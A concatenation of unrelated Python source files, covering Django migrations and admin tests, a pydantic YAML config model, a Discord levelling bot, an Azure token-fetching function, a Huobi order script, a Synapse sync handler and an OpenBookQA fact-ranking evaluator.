('client', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='clients.client')),
('organisation', models.ForeignKey(default=mycarehub.utils.general_utils.default_organisation, on_delete=django.db.models.deletion.PROTECT, related_name='appointments_appointment_related', to='common.organisation')),
('staff', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='staff.staff')),
],
options={
'ordering': ('-updated', '-created'),
'abstract': False,
},
managers=[
('objects', mycarehub.common.models.base_models.AbstractBaseManager()),
],
),
]
|
py | 7dfae1a5a35dbc4160e5605ce5f60da9bc83a17c | import pytest
from django.urls import reverse
from manas_apps.users.models import User
pytestmark = pytest.mark.django_db
class TestUserAdmin:
def test_changelist(self, admin_client):
url = reverse("admin:users_user_changelist")
response = admin_client.get(url)
assert response.status_code == 200
def test_search(self, admin_client):
url = reverse("admin:users_user_changelist")
response = admin_client.get(url, data={"q": "test"})
assert response.status_code == 200
def test_add(self, admin_client):
url = reverse("admin:users_user_add")
response = admin_client.get(url)
assert response.status_code == 200
response = admin_client.post(
url,
data={
"username": "test",
"password1": "My_R@ndom-P@ssw0rd",
"password2": "My_R@ndom-P@ssw0rd",
},
)
assert response.status_code == 302
assert User.objects.filter(username="test").exists()
def test_view_user(self, admin_client):
user = User.objects.get(username="admin")
url = reverse("admin:users_user_change", kwargs={"object_id": user.pk})
response = admin_client.get(url)
assert response.status_code == 200
|
py | 7dfae1c98c1b90e8753745471d83170850175ca2 | from functools import reduce
from pathlib import Path
from typing import TYPE_CHECKING, Iterable, List, Optional, Type, TypeVar, Union
from pydantic import BaseModel, Field, validator
from pydantic.fields import ModelField
from pydantic_yaml import YamlModel
from .util import dict_merge
from .yaml import yaml
if TYPE_CHECKING:
Model = TypeVar("Model", bound="BaseModel")
def default_if_none(cls, v, field: ModelField):
if v is None:
if getattr(field, "default", None) is not None:
return field.default
if field.default_factory is not None:
return field.default_factory()
else:
return v
class BaseYamlConfigModel(YamlModel):
config_path: Path = Field(Path("."), exclude=True)
def __or__(self, other: "Model") -> "Model":
return type(self).parse_obj(
dict_merge(
self.dict(exclude={"config_path": {}}, exclude_defaults=True),
other.dict(exclude={"config_path": {}}, exclude_defaults=True),
)
)
@classmethod
def parse_file(
cls: Type["Model"],
path: Union[str, Path],
**kwargs,
) -> "Model":
obj = super(BaseYamlConfigModel, cls).parse_file(path, **kwargs)
obj.config_path = Path(path)
return obj
def yaml(self, with_descriptions=False, **dict_kwargs):
if with_descriptions:
yaml_dict = yaml.load(self.yaml(**dict_kwargs))
_construct_yaml_dict_with_comments(type(self), yaml_dict)
else:
yaml_dict = self.dict(**dict_kwargs)
return yaml.dump_str(yaml_dict)
def write_yaml(self, path: Path = None, create_parents: bool = True, **yaml_kwargs):
if path is None:
path = self.config_path
if create_parents:
path.parent.mkdir(exist_ok=True, parents=True)
path.write_text(self.yaml(**yaml_kwargs))
@classmethod
def none(cls: Type["Model"]) -> "Model":
return cls.construct(**{field: None for field in cls.__fields__})
class BaseYamlConfigModelWithBase(BaseYamlConfigModel):
base_config: Optional[List[Path]] = Field(default_factory=list)
@validator("base_config", pre=True)
def ensure_base_config_type(cls, v):
if v is None:
return []
if isinstance(v, str):
return [Path(v)]
if isinstance(v, Iterable):
return list(v)
if isinstance(v, Path):
return [v]
raise ValueError(f"invalid value for base_config: '{v}'")
def merge_bases(self):
base_configs = [
config_path if config_path.is_absolute() else self.config_path.parent / config_path
for config_path in self.base_config
]
base_configs = [
type(self).parse_file(config_path).merge_bases() for config_path in base_configs
]
if not base_configs:
return self
bases_merged = reduce(lambda a, b: a | b, base_configs)
return bases_merged | self
def _construct_yaml_dict_with_comments(cls, d, column=0):
for k, v in d.items():
field = cls.__fields__[k]
if issubclass(field.type_, BaseModel):
_construct_yaml_dict_with_comments(field.type_, v, column + 4)
if field.field_info.description:
d.yaml_set_comment_before_key(k, field.field_info.description, column=column)
d.yaml_add_newline_before_key(k)
|
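As a quick illustration of the layered-config pattern in the model above, here is a hedged sketch; the AppConfig class, its fields, and the dev.yml/base.yml paths are assumptions invented for the example, not part of the module.
class AppConfig(BaseYamlConfigModelWithBase):
    host: str = "localhost"
    port: int = 8000
# dev.yml would declare `base_config: [base.yml]` and override only what it needs;
# merge_bases() resolves base.yml relative to dev.yml and folds the layers together
# using the `|` operator defined on BaseYamlConfigModel.
cfg = AppConfig.parse_file("dev.yml").merge_bases()
print(cfg.yaml())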
py | 7dfae3b7b86eabe16314d359adf0ec8659b8437a | # coding: utf-8
"""
SignRequest API
API for SignRequest.com
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import signrequest_client
from signrequest_client.models.inline_response200 import InlineResponse200 # noqa: E501
from signrequest_client.rest import ApiException
class TestInlineResponse200(unittest.TestCase):
"""InlineResponse200 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineResponse200(self):
"""Test InlineResponse200"""
# FIXME: construct object with mandatory attributes with example values
# model = signrequest_client.models.inline_response200.InlineResponse200() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
py | 7dfae3f5293cdea298b74aa61d14fffc346da02d | # Generated by Django 2.0.6 on 2018-07-10 12:12
from django.conf import settings
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
bases=('auth.user', models.Model),
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
]
|
py | 7dfae437160c7c9c9da826179e1f8c53cbd5619b | # Imports
import asyncio
import discord
from discord.ext import commands
from pymongo import MongoClient
from ruamel.yaml import YAML
import vacefron
import os
import re
from dotenv import load_dotenv
# Loads the .env file and gets the required information
load_dotenv()
MONGODB_URI = os.environ['MONGODB_URI']
COLLECTION = os.getenv("COLLECTION")
DB_NAME = os.getenv("DATABASE_NAME")
# Please enter your mongodb details in the .env file.
cluster = MongoClient(MONGODB_URI)
levelling = cluster[COLLECTION][DB_NAME]
# Reads the config file, no need for changing.
yaml = YAML()
with open("Configs/config.yml", "r", encoding="utf-8") as file:
config = yaml.load(file)
if os.path.exists("Configs/holidayconfig.yml") is True:
with open("Configs/holidayconfig.yml", "r", encoding="utf-8") as file3:
holidayconfig = yaml.load(file3)
# Vac-API, no need for altering!
vac_api = vacefron.Client()
class levelsys(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_message(self, ctx):
if not ctx.author.bot:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
serverstats = levelling.find_one({"server": ctx.guild.id})
bot_stats = levelling.find_one({"bot_name": self.client.user.name})
talk_channels = serverstats['ignored_channels']
if len(talk_channels) > 1 and ctx.channel.id not in talk_channels or config['Prefix'] in ctx.content:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"]
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
elif len(talk_channels) < 1 or ctx.channel.id in talk_channels:
if bot_stats["event_state"] is True:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats['xp'] + serverstats['xp_per_message'] * holidayconfig['bonus_xp']
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
user = ctx.author
role = discord.utils.get(ctx.guild.roles, name=serverstats["double_xp_role"])
if role in user.roles:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"] + serverstats['xp_per_message'] * 2
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
else:
stats = levelling.find_one({"guildid": ctx.guild.id, "id": ctx.author.id})
xp = stats["xp"] + serverstats['xp_per_message']
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": xp}})
xp = stats['xp']
lvl = 0
while True:
if xp < ((config['xp_per_level'] / 2 * (lvl ** 2)) + (config['xp_per_level'] / 2 * lvl)):
break
lvl += 1
xp -= ((config['xp_per_level'] / 2 * ((lvl - 1) ** 2)) + (config['xp_per_level'] / 2 * (lvl - 1)))
if stats["xp"] < 0:
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"xp": 0}})
if stats["rank"] != lvl:
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id}, {"$set": {"rank": lvl + 1}})
embed2 = discord.Embed(title=f":tada: **LEVEL UP!**",
description=f"{ctx.author.mention} just reached Level: **{lvl}**",
colour=config['embed_colour'])
xp = stats["xp"]
levelling.update_one({"guildid": ctx.guild.id, "id": ctx.author.id},
{"$set": {"rank": lvl, "xp": xp + serverstats['xp_per_message'] * 2}})
print(f"User: {ctx.author} | Leveled UP To: {lvl}")
embed2.add_field(name="Next Level:",
value=f"`{int(config['xp_per_level'] * 2 * ((1 / 2) * lvl))}xp`")
embed2.set_thumbnail(url=ctx.author.avatar_url)
member = ctx.author
channel = discord.utils.get(member.guild.channels, name=serverstats["level_channel"])
if channel is None:
return
if config['level_up_ping'] is True:
await channel.send(f"{ctx.author.mention},")
msg = await channel.send(embed=embed2)
level_roles = serverstats["role"]
level_roles_num = serverstats["level"]
for i in range(len(level_roles)):
if lvl == int(level_roles_num[i]):
await ctx.author.add_roles(
discord.utils.get(ctx.author.guild.roles, name=level_roles[i]))
embed2.add_field(name="Role Unlocked", value=f"`{level_roles[i]}`")
print(f"User: {ctx.author} | Unlocked Role: {level_roles[i]}")
embed2.set_thumbnail(url=ctx.author.avatar_url)
await msg.edit(embed=embed2)
# remove the previous role
if i > 0:
await ctx.author.remove_roles(
discord.utils.get(ctx.author.guild.roles, name=level_roles[i - 1]))
else:
continue
@commands.Cog.listener()
async def on_guild_join(self, guild):
await asyncio.sleep(1.5)
serverstats = levelling.find_one({"server": guild.id})
if serverstats is None:
newserver = {"server": guild.id, "xp_per_message": 10, "double_xp_role": "None",
"level_channel": "private",
"Antispam": False, "mutedRole": "None", "mutedTime": 300, "warningMessages": 5,
"muteMessages": 6,
"ignoredRole": "None", "event": "Ended", "ignored_channels": []}
levelling.insert_one(newserver)
if config['private_message'] is True:
overwrites = {
guild.default_role: discord.PermissionOverwrite(read_messages=False),
guild.me: discord.PermissionOverwrite(read_messages=True)
}
prefix = config['Prefix']
embed = discord.Embed(title=f"👋 // Greetings, {guild.name}",
description=f"Thanks for inviting me, my prefix here is: `{prefix}`")
if os.path.exists("Addons/Extras+.py") is True:
embed.add_field(name="🚀 | What's Next?",
value=f"`{prefix}help` displays every command you need to know for {self.client.user.mention}",
inline=False)
embed.add_field(name="🧭 | Important Links:",
value=f"[Support Server](https://www.discord.gg/E56eZdNjK4) - Get support for {self.client.user.mention}")
if guild.system_channel is None:
await guild.create_text_channel('private', overwrites=overwrites)
channel = discord.utils.get(guild.channels, name="private")
if channel is None:
return
await channel.send(embed=embed)
else:
await guild.system_channel.send(embed=embed)
for member in guild.members:
if not member.bot:
serverstats = levelling.find_one({"server": guild.id})
economy_stats = levelling.find_one(
{"guildid": guild.id, "id": member.id, "money": {"$exists": True}})
if economy_stats:
user = f"<@{member.id}>"
levelling.update_one({"guildid": guild.id, "id": member.id}, {
"$set": {"tag": user, "xp": serverstats['xp_per_message'], "rank": 1, "background": " ",
"circle": False, "xp_colour": "#ffffff", "name": f"{member}", "warnings": 0}})
continue
else:
newuser = {"guildid": member.guild.id, "id": member.id, "tag": f"<@{member.id}>",
"xp": serverstats['xp_per_message'],
"rank": 1, "background": " ", "circle": False, "xp_colour": "#ffffff", "warnings": 0,
"name": str(member)}
levelling.insert_one(newuser)
print(f"User: {member.id} has been added to the database!")
@commands.Cog.listener()
async def on_guild_remove(self, guild):
# Removes the server from the database
levelling.delete_one({"server": guild.id})
# Deletes all users when they bot is removed from the server
for member in guild.members:
if not member.bot:
levelling.delete_one({"guildid": guild.id, "id": member.id})
print(f"User: {member.id} has been removed from the database!")
@commands.Cog.listener()
async def on_member_join(self, member):
if not member.bot:
await asyncio.sleep(1.5)
serverstats = levelling.find_one({"server": member.guild.id})
economy_stats = levelling.find_one(
{"guildid": member.guild.id, "id": member.id, "money": {"$exists": True}})
if economy_stats:
user = f"<@{member.id}>"
levelling.update_one({"guildid": member.guild.id, "id": member.id}, {
"$set": {"tag": user, "xp": serverstats['xp_per_message'], "rank": 1, "background": " ",
"circle": False, "xp_colour": "#ffffff", "name": f"{member}", "warnings": 0}})
else:
getGuild = levelling.find_one({"server": member.guild.id})
newuser = {"guildid": member.guild.id, "id": member.id, "tag": f"<@{member.id}>",
"xp": getGuild["xp_per_message"],
"rank": 1, "background": " ", "circle": False, "xp_colour": "#ffffff", "warnings": 0,
"name": str(member)}
levelling.insert_one(newuser)
print(f"User: {member.id} has been added to the database!")
@commands.Cog.listener()
async def on_member_remove(self, member):
if not member.bot:
levelling.delete_one({"guildid": member.guild.id, "id": member.id})
print(f"User: {member.id} has been removed from the database!")
def setup(client):
client.add_cog(levelsys(client))
# End Of Level System
|
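To make the level arithmetic in on_message easier to verify on its own, here is a stand-alone sketch of the same loop; the xp_per_level value of 20 is only an assumed example, not a claim about the shipped config.
def level_for_xp(xp, xp_per_level=20):
    # Mirrors the while-loop in levelsys.on_message: each pass checks the cost of the
    # current level, xp_per_level/2 * (lvl**2 + lvl), and spends it to advance.
    lvl = 0
    while xp >= (xp_per_level / 2) * (lvl ** 2 + lvl):
        lvl += 1
        xp -= (xp_per_level / 2) * ((lvl - 1) ** 2 + (lvl - 1))
    return lvl
assert level_for_xp(50, 20) == 2   # 20 xp spent reaching level 2, 30 xp left over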
py | 7dfae575d6601b2e7c241053b946c5869fe4e2c4 | # Generated by Django 2.1.7 on 2019-04-03 07:49
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounting_tech', '0015_auto_20190403_1035'),
]
operations = [
migrations.CreateModel(
name='Request_to_repair',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('complainant', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='accounting_tech.Employees', verbose_name='Заявитель')),
],
),
migrations.AddField(
model_name='equipment',
name='inventory_number',
field=models.CharField(blank=True, default='0-53999', max_length=100, verbose_name='ИНВ №'),
),
]
|
py | 7dfae632076cf0fd38f824a90a99a86113e392e1 | # This function is not intended to be invoked directly. Instead it will be triggered by an orchestrator function.
import os
import requests
import json
from urllib import parse
import azure.functions as func
resource = 'https://manage.office.com'
def main(name: str) -> dict:
data = json.loads(name)
clientSecret = os.getenv(data['secretKey'])
clientId = data['clientId']
tenantId = data['tenantId']
tokenHost = 'https://login.microsoftonline.com/' + tenantId + '/oauth2/token'
params = {'resource' : resource, 'client_id' : clientId, 'client_secret' : clientSecret, 'grant_type' : 'client_credentials'}
body = parse.urlencode(params).encode("utf-8")
    # The AAD token endpoint expects a POST with form-encoded credentials.
    response = requests.post(tokenHost, data=body)
jsonResponse = json.loads(response.text)
aadToken = jsonResponse["access_token"]
tenantReq = {'tenantId' : tenantId,'token' : aadToken}
return(tenantReq)
|
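For reference, a hedged sketch of the activity input the function above expects from its orchestrator; the key names follow what main() reads, while the GUIDs and the APP_SECRET app setting are placeholders.
import json
import os
os.environ.setdefault("APP_SECRET", "<client-secret>")   # main() resolves secretKey via os.getenv
activity_input = json.dumps({
    "secretKey": "APP_SECRET",
    "clientId": "00000000-0000-0000-0000-000000000000",
    "tenantId": "11111111-1111-1111-1111-111111111111",
})
# result = main(activity_input)   # -> {"tenantId": "...", "token": "<bearer token>"}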
py | 7dfae7019df99653c7268d589f060c6d39c1472c | from huobi.client.trade import TradeClient
from huobi.constant import *
from huobi.utils import *
from keys import *  # "keys.py" is a filename; the module is imported as "keys"
symbol_test = "ftiusdt"
trade_client = TradeClient(g_api_key, g_secret_key)
order_id = trade_client.create_order(symbol=symbol_test, account_id=g_account_id, order_type=OrderType.SELL_LIMIT, source=OrderSource.API, amount=1.0, price=50000)
LogInfo.output("created order id : {id}".format(id=order_id))
orderObj = trade_client.get_order(order_id=order_id)
LogInfo.output("======= get order by order id : {order_id} =======".format(order_id=order_id))
orderObj.print_object()
#canceled_order_id = trade_client.cancel_order(symbol_test, order_id)
#if canceled_order_id == order_id:
# LogInfo.output("cancel order {id} done".format(id=canceled_order_id))
#else:
# LogInfo.output("cancel order {id} fail".format(id=canceled_order_id))
|
py | 7dfae78db01e74b6b1813c13365a7a2759014098 | # -*- coding: utf-8 -*-
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from twisted.internet import defer
from synapse.api.constants import EventTypes, Membership
from synapse.api.errors import AuthError, Codes, SynapseError
from synapse.events.utils import serialize_event
from synapse.events.validator import EventValidator
from synapse.handlers.presence import format_user_presence_state
from synapse.streams.config import PaginationConfig
from synapse.types import StreamToken, UserID
from synapse.util import unwrapFirstError
from synapse.util.async_helpers import concurrently_execute
from synapse.util.caches.snapshot_cache import SnapshotCache
from synapse.util.logcontext import make_deferred_yieldable, run_in_background
from synapse.visibility import filter_events_for_client
from ._base import BaseHandler
logger = logging.getLogger(__name__)
class InitialSyncHandler(BaseHandler):
def __init__(self, hs):
super(InitialSyncHandler, self).__init__(hs)
self.hs = hs
self.state = hs.get_state_handler()
self.clock = hs.get_clock()
self.validator = EventValidator()
self.snapshot_cache = SnapshotCache()
def snapshot_all_rooms(self, user_id=None, pagin_config=None,
as_client_event=True, include_archived=False):
"""Retrieve a snapshot of all rooms the user is invited or has joined.
This snapshot may include messages for all rooms where the user is
joined, depending on the pagination config.
Args:
user_id (str): The ID of the user making the request.
pagin_config (synapse.api.streams.PaginationConfig): The pagination
config used to determine how many messages *PER ROOM* to return.
as_client_event (bool): True to get events in client-server format.
include_archived (bool): True to get rooms that the user has left
Returns:
A list of dicts with "room_id" and "membership" keys for all rooms
the user is currently invited or joined in on. Rooms where the user
is joined on, may return a "messages" key with messages, depending
on the specified PaginationConfig.
"""
key = (
user_id,
pagin_config.from_token,
pagin_config.to_token,
pagin_config.direction,
pagin_config.limit,
as_client_event,
include_archived,
)
now_ms = self.clock.time_msec()
result = self.snapshot_cache.get(now_ms, key)
if result is not None:
return result
return self.snapshot_cache.set(now_ms, key, self._snapshot_all_rooms(
user_id, pagin_config, as_client_event, include_archived
))
@defer.inlineCallbacks
def _snapshot_all_rooms(self, user_id=None, pagin_config=None,
as_client_event=True, include_archived=False):
memberships = [Membership.INVITE, Membership.JOIN]
if include_archived:
memberships.append(Membership.LEAVE)
room_list = yield self.store.get_rooms_for_user_where_membership_is(
user_id=user_id, membership_list=memberships
)
user = UserID.from_string(user_id)
rooms_ret = []
now_token = yield self.hs.get_event_sources().get_current_token()
presence_stream = self.hs.get_event_sources().sources["presence"]
pagination_config = PaginationConfig(from_token=now_token)
presence, _ = yield presence_stream.get_pagination_rows(
user, pagination_config.get_source_config("presence"), None
)
receipt_stream = self.hs.get_event_sources().sources["receipt"]
receipt, _ = yield receipt_stream.get_pagination_rows(
user, pagination_config.get_source_config("receipt"), None
)
tags_by_room = yield self.store.get_tags_for_user(user_id)
account_data, account_data_by_room = (
yield self.store.get_account_data_for_user(user_id)
)
public_room_ids = yield self.store.get_public_room_ids()
limit = pagin_config.limit
if limit is None:
limit = 10
@defer.inlineCallbacks
def handle_room(event):
d = {
"room_id": event.room_id,
"membership": event.membership,
"visibility": (
"public" if event.room_id in public_room_ids
else "private"
),
}
if event.membership == Membership.INVITE:
time_now = self.clock.time_msec()
d["inviter"] = event.sender
invite_event = yield self.store.get_event(event.event_id)
d["invite"] = serialize_event(invite_event, time_now, as_client_event)
rooms_ret.append(d)
if event.membership not in (Membership.JOIN, Membership.LEAVE):
return
try:
if event.membership == Membership.JOIN:
room_end_token = now_token.room_key
deferred_room_state = run_in_background(
self.state_handler.get_current_state,
event.room_id,
)
elif event.membership == Membership.LEAVE:
room_end_token = "s%d" % (event.stream_ordering,)
deferred_room_state = run_in_background(
self.store.get_state_for_events,
[event.event_id],
)
deferred_room_state.addCallback(
lambda states: states[event.event_id]
)
(messages, token), current_state = yield make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(
self.store.get_recent_events_for_room,
event.room_id,
limit=limit,
end_token=room_end_token,
),
deferred_room_state,
]
)
).addErrback(unwrapFirstError)
messages = yield filter_events_for_client(
self.store, user_id, messages
)
start_token = now_token.copy_and_replace("room_key", token)
end_token = now_token.copy_and_replace("room_key", room_end_token)
time_now = self.clock.time_msec()
d["messages"] = {
"chunk": [
serialize_event(m, time_now, as_client_event)
for m in messages
],
"start": start_token.to_string(),
"end": end_token.to_string(),
}
d["state"] = [
serialize_event(c, time_now, as_client_event)
for c in current_state.values()
]
account_data_events = []
tags = tags_by_room.get(event.room_id)
if tags:
account_data_events.append({
"type": "m.tag",
"content": {"tags": tags},
})
account_data = account_data_by_room.get(event.room_id, {})
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
d["account_data"] = account_data_events
except Exception:
logger.exception("Failed to get snapshot")
yield concurrently_execute(handle_room, room_list, 10)
account_data_events = []
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
now = self.clock.time_msec()
ret = {
"rooms": rooms_ret,
"presence": [
{
"type": "m.presence",
"content": format_user_presence_state(event, now),
}
for event in presence
],
"account_data": account_data_events,
"receipts": receipt,
"end": now_token.to_string(),
}
defer.returnValue(ret)
@defer.inlineCallbacks
def room_initial_sync(self, requester, room_id, pagin_config=None):
"""Capture the a snapshot of a room. If user is currently a member of
the room this will be what is currently in the room. If the user left
the room this will be what was in the room when they left.
Args:
requester(Requester): The user to get a snapshot for.
room_id(str): The room to get a snapshot of.
pagin_config(synapse.streams.config.PaginationConfig):
The pagination config used to determine how many messages to
return.
Raises:
AuthError if the user wasn't in the room.
Returns:
A JSON serialisable dict with the snapshot of the room.
"""
blocked = yield self.store.is_room_blocked(room_id)
if blocked:
raise SynapseError(403, "This room has been blocked on this server")
user_id = requester.user.to_string()
membership, member_event_id = yield self._check_in_room_or_world_readable(
room_id, user_id,
)
is_peeking = member_event_id is None
if membership == Membership.JOIN:
result = yield self._room_initial_sync_joined(
user_id, room_id, pagin_config, membership, is_peeking
)
elif membership == Membership.LEAVE:
result = yield self._room_initial_sync_parted(
user_id, room_id, pagin_config, membership, member_event_id, is_peeking
)
account_data_events = []
tags = yield self.store.get_tags_for_room(user_id, room_id)
if tags:
account_data_events.append({
"type": "m.tag",
"content": {"tags": tags},
})
account_data = yield self.store.get_account_data_for_room(user_id, room_id)
for account_data_type, content in account_data.items():
account_data_events.append({
"type": account_data_type,
"content": content,
})
result["account_data"] = account_data_events
defer.returnValue(result)
@defer.inlineCallbacks
def _room_initial_sync_parted(self, user_id, room_id, pagin_config,
membership, member_event_id, is_peeking):
room_state = yield self.store.get_state_for_events(
[member_event_id],
)
room_state = room_state[member_event_id]
limit = pagin_config.limit if pagin_config else None
if limit is None:
limit = 10
stream_token = yield self.store.get_stream_token_for_event(
member_event_id
)
messages, token = yield self.store.get_recent_events_for_room(
room_id,
limit=limit,
end_token=stream_token
)
messages = yield filter_events_for_client(
self.store, user_id, messages, is_peeking=is_peeking
)
start_token = StreamToken.START.copy_and_replace("room_key", token)
end_token = StreamToken.START.copy_and_replace("room_key", stream_token)
time_now = self.clock.time_msec()
defer.returnValue({
"membership": membership,
"room_id": room_id,
"messages": {
"chunk": [serialize_event(m, time_now) for m in messages],
"start": start_token.to_string(),
"end": end_token.to_string(),
},
"state": [serialize_event(s, time_now) for s in room_state.values()],
"presence": [],
"receipts": [],
})
@defer.inlineCallbacks
def _room_initial_sync_joined(self, user_id, room_id, pagin_config,
membership, is_peeking):
current_state = yield self.state.get_current_state(
room_id=room_id,
)
# TODO: These concurrently
time_now = self.clock.time_msec()
state = [
serialize_event(x, time_now)
for x in current_state.values()
]
now_token = yield self.hs.get_event_sources().get_current_token()
limit = pagin_config.limit if pagin_config else None
if limit is None:
limit = 10
room_members = [
m for m in current_state.values()
if m.type == EventTypes.Member
and m.content["membership"] == Membership.JOIN
]
presence_handler = self.hs.get_presence_handler()
@defer.inlineCallbacks
def get_presence():
# If presence is disabled, return an empty list
if not self.hs.config.use_presence:
defer.returnValue([])
states = yield presence_handler.get_states(
[m.user_id for m in room_members],
as_event=True,
)
defer.returnValue(states)
@defer.inlineCallbacks
def get_receipts():
receipts = yield self.store.get_linearized_receipts_for_room(
room_id,
to_key=now_token.receipt_key,
)
if not receipts:
receipts = []
defer.returnValue(receipts)
presence, receipts, (messages, token) = yield make_deferred_yieldable(
defer.gatherResults(
[
run_in_background(get_presence),
run_in_background(get_receipts),
run_in_background(
self.store.get_recent_events_for_room,
room_id,
limit=limit,
end_token=now_token.room_key,
)
],
consumeErrors=True,
).addErrback(unwrapFirstError),
)
messages = yield filter_events_for_client(
self.store, user_id, messages, is_peeking=is_peeking,
)
start_token = now_token.copy_and_replace("room_key", token)
end_token = now_token
time_now = self.clock.time_msec()
ret = {
"room_id": room_id,
"messages": {
"chunk": [serialize_event(m, time_now) for m in messages],
"start": start_token.to_string(),
"end": end_token.to_string(),
},
"state": state,
"presence": presence,
"receipts": receipts,
}
if not is_peeking:
ret["membership"] = membership
defer.returnValue(ret)
@defer.inlineCallbacks
def _check_in_room_or_world_readable(self, room_id, user_id):
try:
# check_user_was_in_room will return the most recent membership
# event for the user if:
# * The user is a non-guest user, and was ever in the room
# * The user is a guest user, and has joined the room
# else it will throw.
member_event = yield self.auth.check_user_was_in_room(room_id, user_id)
defer.returnValue((member_event.membership, member_event.event_id))
return
except AuthError:
visibility = yield self.state_handler.get_current_state(
room_id, EventTypes.RoomHistoryVisibility, ""
)
if (
visibility and
visibility.content["history_visibility"] == "world_readable"
):
defer.returnValue((Membership.JOIN, None))
return
raise AuthError(
403, "Guest access not allowed", errcode=Codes.GUEST_ACCESS_FORBIDDEN
)
|
py | 7dfae7df53cc9811a91b79a3be44a90fb3cbd9c7 | import json
import collections
import numpy as np
from tqdm import tqdm
import operator
Entry = collections.namedtuple("Entry","qid fact1 fact2 hyp1 hyp2 hyp3 hyp4 ans label")
def read_ranked(fname,topk):
fd = open(fname,"r").readlines()
ranked={}
for line in tqdm(fd,desc="Ranking "+fname+" :"):
line = line.strip()
out = json.loads(line)
ranked[out["id"]]=out["ext_fact_global_ids"][0:topk]
return ranked
def read_knowledge(fname):
lines = open(fname,"r").readlines()
knowledgemap = {}
knowledge=[]
for index,fact in tqdm(enumerate(lines),desc="Reading Knowledge:"):
f=fact.strip().replace('"',"").lower()
knowledgemap[f]=index
knowledge.append(f)
return knowledgemap,knowledge
def read_hyp_dataset(fname):
fd = open(fname,"r").readlines()
dataset = {}
for line in tqdm(fd,desc="Reading Datasets:"):
line = line.strip().split("\t")
qid = line[0]
passage = line[1].split(" . ")
choice = line[2:6]
label = line[6]
ans = choice[int(label)]
fact1 = passage[0].strip()
fact2 = passage[1].strip()
entry = Entry(qid=qid,fact1=fact1,fact2=fact2,hyp1=choice[0],hyp2=choice[1],hyp3=choice[2],hyp4=choice[3],ans=ans,label=int(label))
dataset[qid]=entry
return dataset
def merge_ranked(ranked):
tmerged={}
merged={}
for qidx in tqdm(ranked.keys(),desc="Merging"):
qid = qidx.split("__")[0]
choice = qidx[-1]
if qid not in tmerged:
tmerged[qid]={}
scores=ranked[qidx]
for tup in scores:
if tup[0] not in tmerged[qid]:
tmerged[qid][tup[0]]=tup[1]
else:
tmerged[qid][tup[0]]+=tup[1]
sorted_x = sorted(tmerged[qid].items(), key=operator.itemgetter(1))
ranked_list=[]
for tup in reversed(sorted_x):
ranked_list.append(tup)
merged[qid]=ranked_list
# if qid == "8-343":
# print(merged[qid])
return merged
def score_ranked_fact1(ranked,datasets,knowledgemap,knowledge,is_merged=False):
topklist = [1,3,5,10,20,50]
choices = ["__ch_0","__ch_1","__ch_2","__ch_3"]
for dataset in datasets:
counts=[0,0,0,0,0,0]
counts_ans=[0,0,0,0,0,0]
pr=5
print("For Dataset:")
for index,topk in enumerate(topklist):
for qid,entry in dataset.items():
fact1 = entry.fact1
label = entry.label
fidx = knowledgemap[fact1.strip().lower()]
if pr<5:
print(qid,fact1,fidx)
found = False
found_ans = False
for choice in choices:
if not is_merged:
idx = qid+choice
else:
idx=qid
ranked_list=ranked[idx]
processed = [tup[0] for tup in ranked_list]
if fidx in processed[0:topk]:
found=True
if choice[-1]==str(label) and fidx in processed[0:topk]:
found_ans=True
if pr<5:
for f in processed[0:1]:
prob=0
for tup in ranked_list:
if tup[0] == f:
prob = tup[1]
print(qid,"\t","\t",choice,knowledge[f],f,prob)
pr+=1
if found:
counts[index]+=1
if found_ans:
counts_ans[index]+=1
print("Counts@\t1,3,5,10,20,50\n")
print("\t",counts)
print("\t",counts_ans)
knowledgemap,knowledge = read_knowledge("../data/knowledge/openbook.txt")
test = read_hyp_dataset("../data/hypothesis/hyp-gold-test.tsv")
train = read_hyp_dataset("../data/hypothesis/hyp-gold-train.tsv")
val = read_hyp_dataset("../data/hypothesis/hyp-gold-val.tsv")
